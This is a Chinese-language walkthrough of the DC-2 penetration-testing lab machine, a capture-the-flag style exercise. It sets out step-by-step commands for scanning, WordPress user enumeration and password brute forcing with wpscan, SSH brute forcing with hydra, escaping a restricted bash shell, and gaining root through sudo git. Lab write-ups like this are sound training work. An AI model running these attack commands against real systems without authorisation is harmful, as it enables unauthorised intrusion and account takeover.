[渗透实战]:渗透测试实战-DC-2-靶机入侵
[渗透实战]:渗透测试实战-DC-2-靶机入侵
DC-2 靶机实战
靶机资源下载:
我的百度网盘
启动DC-2
配置其网络为NAT,查看其Mac 地址,重启DC-2 使其网路配置生效
使用nmap 扫描内网网段
得到DC-2 的IP地址192.168.1.162
对其进行信息收集
访问其IP ,连接失败
添加本地DNS解析
vim /etc/hosts
再访问该网站,解析成功
flag1
cewl 工具
cewl dc-2 >pwd.dic
网站目录扫描
使用MSF 进行网站目录扫描
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.162
set THREADS 50
exploit
wpscan工具
wpscan --update
apt-get install wpscan wpscan 更新
注:如果wpscan 无法使用,可以尝试更换新的kali 虚拟机,笔者就碰到类似的问题,安装 kali 2020.2 之后,wpscan 启动成功
附清华大学开源镜像站kali2020.2(amd64,installer)下载链接
https://mirrors.tuna.tsinghua.edu.cn/kali-images/current/kali-linux-2020.2-installer-amd64.iso
wpscan --url dc-2 -e u
wpscan 爆破用户
wpscan --url dc-2 -U user.dic -P pwd.dic
flag2
192.168.1.162/wp-admin
使用jerry用户并用我们爆破出来的密码尝试登录
找到flag2
他告诉我们需要另辟蹊径,我们想到了刚开始使用nmap 扫描时,还扫出了ssh 端口7744
hydra 爆破ssh
hydra -L user.dic -P pwd.dic ssh://192.168.1.162 -s 7744 -o hydra.ssh -vV
查看结果:
尝试使用ssh 登录
ssh tom@192.168.1.162 -p 7744
查看当前目录文件
ls
cat flag3.txt
发现有rbash 命令限制
flag3
绕过限制
BASH_CMDS[a]=/bin/sh;a
/bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
flag4
切换用户
切换jerry用户
su jerry
输入密码,登录成功
我们进入到jerry 用户的家目录
执行命令,发现没有权限
final-flag
提权
查看具有root权限的命令
sudo -l
发现git 命令具有root 权限,但是不需要提供给root 密码
git 提权
sudo git -p --help
强制进入交互式状态,让页面缓冲区无法显示全部信息
!/bin/bash